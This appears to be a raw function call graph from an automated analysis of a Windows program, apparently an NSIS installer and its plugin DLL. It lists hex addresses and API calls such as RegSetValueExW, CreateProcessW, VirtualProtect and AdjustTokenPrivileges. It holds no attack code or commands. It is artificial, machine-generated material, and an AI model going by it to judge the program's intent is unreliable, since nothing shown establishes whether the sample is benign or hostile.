4354 10001828 4348->4354 4358 10001895 4350->4358 4454 1000246c 4350->4454 4352->4336 4352->4337 4357 100024a9 10 API calls 4354->4357 4356 100017d5 4356->4352 4357->4350 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4338 4408->4339 4408->4352 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4352 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4440 100024b3 4434->4440 4435 10002541 lstrcpynW 4435->4440 4436 1000250b MultiByteToWideChar 4436->4440 4437 10002571 GlobalFree 4437->4440 4438 10002554 wsprintfW 4438->4440 4439 100025ac GlobalFree 4439->4345 4440->4434 4440->4435 4440->4436 4440->4437 4440->4438 4440->4439 4441 10001272 2 API calls 4440->4441 4480 100012e1 4440->4480 4441->4440 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4350 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4440 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4440 4483->4482 4484->4445 4861 4016c4 4862 402bbf 18 API calls 4861->4862 4863 4016ca GetFullPathNameW 4862->4863 4864 4016e4 4863->4864 4865 401706 4863->4865 4864->4865 4868 406398 2 API calls 4864->4868 4866 40171b GetShortPathNameW 4865->4866 4867 402a4c 4865->4867 4866->4867 4869 4016f6 4868->4869 4869->4865 4871 406055 lstrcpynW 4869->4871 4871->4865 4872 4014cb 4873 4051b4 25 API calls 4872->4873 4874 4014d2 4873->4874 4875 40194e 4876 402bbf 18 API calls 4875->4876 4877 401955 lstrlenW 4876->4877 4878 402531 4877->4878 4879 4027ce 4880 4027d6 4879->4880 4881 4027da FindNextFileW 4880->4881 4884 4027ec 4880->4884 4882 402833 4881->4882 4881->4884 4885 406055 lstrcpynW 4882->4885 4885->4884 4682 401754 4683 402bbf 18 API calls 4682->4683 4684 40175b 4683->4684 4685 405c59 2 API calls 4684->4685 4686 401762 4685->4686 4687 405c59 2 API calls 4686->4687 4687->4686 4886 401d56 GetDC GetDeviceCaps 4887 402ba2 18 API calls 4886->4887 4888 401d74 MulDiv ReleaseDC 4887->4888 4889 402ba2 18 API calls 4888->4889 4890 401d93 4889->4890 4891 406077 18 API calls 4890->4891 4892 401dcc CreateFontIndirectW 4891->4892 4893 402531 4892->4893 4894 401a57 4895 402ba2 18 API calls 4894->4895 4896 401a5d 4895->4896 4897 402ba2 18 API calls 4896->4897 4898 401a05 4897->4898 4899 4014d7 4900 402ba2 18 API calls 4899->4900 4901 4014dd Sleep 4900->4901 4903 402a4c 4901->4903 4904 40155b 4905 4029f2 4904->4905 4908 405f9c wsprintfW 4905->4908 4907 4029f7 4908->4907 4784 401ddc 4785 402ba2 18 API calls 4784->4785 4786 401de2 4785->4786 4787 402ba2 18 API calls 4786->4787 4788 401deb 4787->4788 4789 401df2 ShowWindow 4788->4789 4790 401dfd EnableWindow 4788->4790 4791 402a4c 4789->4791 4790->4791 4909 40385c 4910 403867 4909->4910 4911 40386b 4910->4911 4912 40386e GlobalAlloc 4910->4912 4912->4911 4913 4022df 4914 402bbf 18 API calls 4913->4914 4915 4022ee 4914->4915 4916 402bbf 18 API calls 4915->4916 4917 4022f7 4916->4917 4918 402bbf 18 API calls 4917->4918 4919 402301 GetPrivateProfileStringW 4918->4919 4920 401bdf 4921 402ba2 18 API calls 4920->4921 4922 401be6 4921->4922 4923 402ba2 18 API calls 4922->4923 4924 401bf0 4923->4924 4925 401c00 4924->4925 4926 402bbf 18 API calls 4924->4926 4927 401c10 4925->4927 4928 402bbf 18 API calls 4925->4928 4926->4925 4929 401c1b 4927->4929 4930 401c5f 4927->4930 4928->4927 4932 402ba2 18 API calls 4929->4932 4931 402bbf 18 API calls 4930->4931 4933 401c64 4931->4933 4934 401c20 4932->4934 4935 402bbf 18 API calls 4933->4935 4936 402ba2 18 API calls 4934->4936 4937 401c6d FindWindowExW 4935->4937 4938 401c29 4936->4938 4941 401c8f 4937->4941 4939 401c31 SendMessageTimeoutW 4938->4939 4940 401c4f SendMessageW 4938->4940 4939->4941 4940->4941 4942 401960 4943 402ba2 18 API calls 4942->4943 4944 401967 4943->4944 4945 402ba2 18 API calls 4944->4945 4946 401971 4945->4946 4947 402bbf 18 API calls 4946->4947 4948 40197a 4947->4948 4949 40198e lstrlenW 4948->4949 4950 4019ca 4948->4950 4951 401998 4949->4951 4951->4950 4955 406055 lstrcpynW 4951->4955 4953 4019b3 4953->4950 4954 4019c0 lstrlenW 4953->4954 4954->4950 4955->4953 4956 401662 4957 402bbf 18 API calls 4956->4957 4958 401668 4957->4958 4959 406398 2 API calls 4958->4959 4960 40166e 4959->4960 4961 4019e4 4962 402bbf 18 API calls 4961->4962 4963 4019eb 4962->4963 4964 402bbf 18 API calls 4963->4964 4965 4019f4 4964->4965 4966 4019fb lstrcmpiW 4965->4966 4967 401a0d lstrcmpW 4965->4967 4968 401a01 4966->4968 4967->4968 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4969 401e66 4970 402bbf 18 API calls 4969->4970 4971 401e6c 4970->4971 4972 4051b4 25 API calls 4971->4972 4973 401e76 4972->4973 4974 405735 2 API calls 4973->4974 4975 401e7c 4974->4975 4976 401edb CloseHandle 4975->4976 4977 401e8c WaitForSingleObject 4975->4977 4978 40281e 4975->4978 4976->4978 4979 401e9e 4977->4979 4980 401eb0 GetExitCodeProcess 4979->4980 4981 406467 2 API calls 4979->4981 4982 401ec2 4980->4982 4983 401ecd 4980->4983 4984 401ea5 WaitForSingleObject 4981->4984 4986 405f9c wsprintfW 4982->4986 4983->4976 4984->4979 4986->4983 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4987 404267 lstrlenW 4988 404286 4987->4988 4989 404288 WideCharToMultiByte 4987->4989 4988->4989 4990 401ee9 4991 402bbf 18 API calls 4990->4991 4992 401ef0 4991->4992 4993 406398 2 API calls 4992->4993 4994 401ef6 4993->4994 4995 401f07 4994->4995 4997 405f9c wsprintfW 4994->4997 4997->4995 4998 100018a9 4999 100018cc 4998->4999 5000 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4999->5000 5001 100018ff GlobalFree 4999->5001 5002 10001272 2 API calls 5000->5002 5001->5000 5003 10001a87 GlobalFree GlobalFree 5002->5003 5004 4021ea 5005 402bbf 18 API calls 5004->5005 5006 4021f0 5005->5006 5007 402bbf 18 API calls 5006->5007 5008 4021f9 5007->5008 5009 402bbf 18 API calls 5008->5009 5010 402202 5009->5010 5011 406398 2 API calls 5010->5011 5012 40220b 5011->5012 5013 40221c lstrlenW lstrlenW 5012->5013 5014 40220f 5012->5014 5016 4051b4 25 API calls 5013->5016 5015 4051b4 25 API calls 5014->5015 5018 402217 5014->5018 5015->5018 5017 40225a SHFileOperationW 5016->5017 5017->5014 5017->5018 5019 40156b 5020 401584 5019->5020 5021 40157b ShowWindow 5019->5021 5022 401592 ShowWindow 5020->5022 5023 402a4c 5020->5023 5021->5020 5022->5023 5024 40456d 5025 4045a3 5024->5025 5026 40457d 5024->5026 5027 404180 8 API calls 5025->5027 5028 404119 19 API calls 5026->5028 5029 4045af 5027->5029 5030 40458a SetDlgItemTextW 5028->5030 5030->5025 5031 40226e 5032 402275 5031->5032 5034 402288 5031->5034 5033 406077 18 API calls 5032->5033 5035 402282 5033->5035 5036 40579a MessageBoxIndirectW 5035->5036 5036->5034 5037 4014f1 SetForegroundWindow 5038 402a4c 5037->5038 5039 401673 5040 402bbf 18 API calls 5039->5040 5041 40167a 5040->5041 5042 402bbf 18 API calls 5041->5042 5043 401683 5042->5043 5044 402bbf 18 API calls 5043->5044 5045 40168c MoveFileW 5044->5045 5046 40169f 5045->5046 5052 401698 5045->5052 5048 406398 2 API calls 5046->5048 5050 4021e1 5046->5050 5047 401423 25 API calls 5047->5050 5049 4016ae 5048->5049 5049->5050 5051 405ef6 38 API calls 5049->5051 5051->5052 5052->5047 5053 4052f3 5054 405314 GetDlgItem GetDlgItem GetDlgItem 5053->5054 5055 40549d 5053->5055 5098 40414e SendMessageW 5054->5098 5057 4054a6 GetDlgItem CreateThread CloseHandle 5055->5057 5058 4054ce 5055->5058 5057->5058 5060 4054f9 5058->5060 5061 4054e5 ShowWindow ShowWindow 5058->5061 5062 40551e 5058->5062 5059 405384 5067 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5059->5067 5064 405533 ShowWindow 5060->5064 5065 40550d 5060->5065 5068 405559 5060->5068 5100 40414e SendMessageW 5061->5100 5066 404180 8 API calls 5062->5066 5071 405553 5064->5071 5072 405545 5064->5072 5069 4040f2 SendMessageW 5065->5069 5070 40552c 5066->5070 5073 4053f9 5067->5073 5074 4053dd SendMessageW SendMessageW 5067->5074 5068->5062 5075 405567 SendMessageW 5068->5075 5069->5062 5080 4040f2 SendMessageW 5071->5080 5079 4051b4 25 API calls 5072->5079 5076 40540c 5073->5076 5077 4053fe SendMessageW 5073->5077 5074->5073 5075->5070 5078 405580 CreatePopupMenu 5075->5078 5082 404119 19 API calls 5076->5082 5077->5076 5081 406077 18 API calls 5078->5081 5079->5071 5080->5068 5083 405590 AppendMenuW 5081->5083 5084 40541c 5082->5084 5085 4055c0 TrackPopupMenu 5083->5085 5086 4055ad GetWindowRect 5083->5086 5087 405425 ShowWindow 5084->5087 5088 405459 GetDlgItem SendMessageW 5084->5088 5085->5070 5089 4055db 5085->5089 5086->5085 5090 405448 5087->5090 5091 40543b ShowWindow 5087->5091 5088->5070 5092 405480 SendMessageW SendMessageW 5088->5092 5093 4055f7 SendMessageW 5089->5093 5099 40414e SendMessageW 5090->5099 5091->5090 5092->5070 5093->5093 5094 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5093->5094 5096 405639 SendMessageW 5094->5096 5096->5096 5097 405662 GlobalUnlock SetClipboardData CloseClipboard 5096->5097 5097->5070 5098->5059 5099->5088 5100->5060 5101 100016b6 5102 100016e5 5101->5102 5103 10001b18 22 API calls 5102->5103 5104 100016ec 5103->5104 5105 100016f3 5104->5105 5106 100016ff 5104->5106 5107 10001272 2 API calls 5105->5107 5108 10001726 5106->5108 5109 10001709 5106->5109 5112 100016fd 5107->5112 5110 10001750 5108->5110 5111 1000172c 5108->5111 5113 1000153d 3 API calls 5109->5113 5115 1000153d 3 API calls 5110->5115 5114 100015b4 3 API calls 5111->5114 5116 1000170e 5113->5116 5117 10001731 5114->5117 5115->5112 5118 100015b4 3 API calls 5116->5118 5119 10001272 2 API calls 5117->5119 5120 10001714 5118->5120 5121 10001737 GlobalFree 5119->5121 5122 10001272 2 API calls 5120->5122 5121->5112 5123 1000174b GlobalFree 5121->5123 5124 1000171a GlobalFree 5122->5124 5123->5112 5124->5112 5125 10002238 5126 10002296 5125->5126 5128 100022cc 5125->5128 5127 100022a8 GlobalAlloc 5126->5127 5126->5128 5127->5126 5129 401cfa GetDlgItem GetClientRect 5130 402bbf 18 API calls 5129->5130 5131 401d2c LoadImageW SendMessageW 5130->5131 5132 401d4a DeleteObject 5131->5132 5133 402a4c 5131->5133 5132->5133 4753 4027fb 4754 402bbf 18 API calls 4753->4754 4755 402802 FindFirstFileW 4754->4755 4756 40282a 4755->4756 4760 402815 4755->4760 4757 402833 4756->4757 4761 405f9c wsprintfW 4756->4761 4762 406055 lstrcpynW 4757->4762 4761->4757 4762->4760 4763 40237b 4764 402381 4763->4764 4765 402bbf 18 API calls 4764->4765 4766 402393 4765->4766 4767 402bbf 18 API calls 4766->4767 4768 40239d RegCreateKeyExW 4767->4768 4769 4023c7 4768->4769 4772 40281e 4768->4772 4770 4023e2 4769->4770 4771 402bbf 18 API calls 4769->4771 4774 402ba2 18 API calls 4770->4774 4776 4023ee 4770->4776 4773 4023d8 lstrlenW 4771->4773 4773->4770 4774->4776 4775 402409 RegSetValueExW 4778 40241f RegCloseKey 4775->4778 4776->4775 4777 403027 32 API calls 4776->4777 4777->4775 4778->4772 5134 1000103d 5135 1000101b 5 API calls 5134->5135 5136 10001056 5135->5136 5137 4014ff 5138 401507 5137->5138 5140 40151a 5137->5140 5139 402ba2 18 API calls 5138->5139 5139->5140 5141 401000 5142 401037 BeginPaint GetClientRect 5141->5142 5143 40100c DefWindowProcW 5141->5143 5145 4010f3 5142->5145 5146 401179 5143->5146 5147 401073 CreateBrushIndirect FillRect DeleteObject 5145->5147 5148 4010fc 5145->5148 5147->5145 5149 401102 CreateFontIndirectW 5148->5149 5150 401167 EndPaint 5148->5150 5149->5150 5151 401112 6 API calls 5149->5151 5150->5146 5151->5150 5152 401904 5153 40193b 5152->5153 5154 402bbf 18 API calls 5153->5154 5155 401940 5154->5155 5156 405846 69 API calls 5155->5156 5157 401949 5156->5157 5158 402d04 5159 402d16 SetTimer 5158->5159 5161 402d2f 5158->5161 5159->5161 5160 402d84 5161->5160 5162 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5161->5162 5162->5160 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5163 401907 5164 402bbf 18 API calls 5163->5164 5165 40190e 5164->5165 5166 40579a MessageBoxIndirectW 5165->5166 5167 401917 5166->5167 5168 401e08 5169 402bbf 18 API calls 5168->5169 5170 401e0e 5169->5170 5171 402bbf 18 API calls 5170->5171 5172 401e17 5171->5172 5173 402bbf 18 API calls 5172->5173 5174 401e20 5173->5174 5175 402bbf 18 API calls 5174->5175 5176 401e29 5175->5176 5177 401423 25 API calls 5176->5177 5178 401e30 ShellExecuteW 5177->5178 5179 401e61 5178->5179 5185 40490a 5186 404936 5185->5186 5187 40491a 5185->5187 5189 404969 5186->5189 5190 40493c SHGetPathFromIDListW 5186->5190 5196 40577e GetDlgItemTextW 5187->5196 5192 404953 SendMessageW 5190->5192 5193 40494c 5190->5193 5191 404927 SendMessageW 5191->5186 5192->5189 5195 40140b 2 API calls 5193->5195 5195->5192 5196->5191 5197 1000164f 5198 10001516 GlobalFree 5197->5198 5200 10001667 5198->5200 5199 100016ad GlobalFree 5200->5199 5201 10001682 5200->5201 5202 10001699 VirtualFree 5200->5202 5201->5199 5202->5199 4688 402095 4689 402bbf 18 API calls 4688->4689 4690 40209c 4689->4690 4691 402bbf 18 API calls 4690->4691 4692 4020a6 4691->4692 4693 402bbf 18 API calls 4692->4693 4694 4020b0 4693->4694 4695 402bbf 18 API calls 4694->4695 4696 4020ba 4695->4696 4697 402bbf 18 API calls 4696->4697 4699 4020c4 4697->4699 4698 402103 CoCreateInstance 4703 402122 4698->4703 4699->4698 4700 402bbf 18 API calls 4699->4700 4700->4698 4701 401423 25 API calls 4702 4021e1 4701->4702 4703->4701 4703->4702 5203 401a15 5204 402bbf 18 API calls 5203->5204 5205 401a1e ExpandEnvironmentStringsW 5204->5205 5206 401a32 5205->5206 5208 401a45 5205->5208 5207 401a37 lstrcmpW 5206->5207 5206->5208 5207->5208 5209 402515 5210 402bbf 18 API calls 5209->5210 5211 40251c 5210->5211 5214 405c2a GetFileAttributesW CreateFileW 5211->5214 5213 402528 5214->5213 5215 401b16 5216 402bbf 18 API calls 5215->5216 5217 401b1d 5216->5217 5218 402ba2 18 API calls 5217->5218 5219 401b26 wsprintfW 5218->5219 5220 402a4c 5219->5220 5221 10001058 5223 10001074 5221->5223 5222 100010dd 5223->5222 5224 10001516 GlobalFree 5223->5224 5225 10001092 5223->5225 5224->5225 5226 10001516 GlobalFree 5225->5226 5227 100010a2 5226->5227 5228 100010b2 5227->5228 5229 100010a9 GlobalSize 5227->5229 5230 100010b6 GlobalAlloc 5228->5230 5231 100010c7 5228->5231 5229->5228 5232 1000153d 3 API calls 5230->5232 5233 100010d2 GlobalFree 5231->5233 5232->5231 5233->5222 4780 40159b 4781 402bbf 18 API calls 4780->4781 4782 4015a2 SetFileAttributesW 4781->4782 4783 4015b4 4782->4783 4792 40229d 4793 4022a5 4792->4793 4794 4022ab 4792->4794 4795 402bbf 18 API calls 4793->4795 4796 4022b9 4794->4796 4797 402bbf 18 API calls 4794->4797 4795->4794 4798 4022c7 4796->4798 4799 402bbf 18 API calls 4796->4799 4797->4796 4800 402bbf 18 API calls 4798->4800 4799->4798 4801 4022d0 WritePrivateProfileStringW 4800->4801 5234 401f1d 5235 402bbf 18 API calls 5234->5235 5236 401f24 5235->5236 5237 40642b 5 API calls 5236->5237 5238 401f33 5237->5238 5239 401fb7 5238->5239 5240 401f4f GlobalAlloc 5238->5240 5240->5239 5241 401f63 5240->5241 5242 40642b 5 API calls 5241->5242 5243 401f6a 5242->5243 5244 40642b 5 API calls 5243->5244 5245 401f74 5244->5245 5245->5239 5249 405f9c wsprintfW 5245->5249 5247 401fa9 5250 405f9c wsprintfW 5247->5250 5249->5247 5250->5239 5251 40149e 5252 402288 5251->5252 5253 4014ac PostQuitMessage 5251->5253 5253->5252 5254 40249e 5255 402cc9 19 API calls 5254->5255 5256 4024a8 5255->5256 5257 402ba2 18 API calls 5256->5257 5258 4024b1 5257->5258 5259 4024d5 RegEnumValueW 5258->5259 5260 4024c9 RegEnumKeyW 5258->5260 5262 40281e 5258->5262 5261 4024ee RegCloseKey 5259->5261 5259->5262 5260->5261 5261->5262 5264 40231f 5265 402324 5264->5265 5266 40234f 5264->5266 5267 402cc9 19 API calls 5265->5267 5268 402bbf 18 API calls 5266->5268 5269 40232b 5267->5269 5270 402356 5268->5270 5271 402bbf 18 API calls 5269->5271 5274 40236c 5269->5274 5275 402bff RegOpenKeyExW 5270->5275 5272 40233c RegDeleteValueW RegCloseKey 5271->5272 5272->5274 5282 402c76 5275->5282 5283 402c2a 5275->5283 5276 402c50 RegEnumKeyW 5277 402c62 RegCloseKey 5276->5277 5276->5283 5279 40642b 5 API calls 5277->5279 5278 402c87 RegCloseKey 5278->5282 5281 402c72 5279->5281 5280 402bff 5 API calls 5280->5283 5281->5282 5284 402ca2 RegDeleteKeyW 5281->5284 5282->5274 5283->5276 5283->5277 5283->5278 5283->5280 5284->5282 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 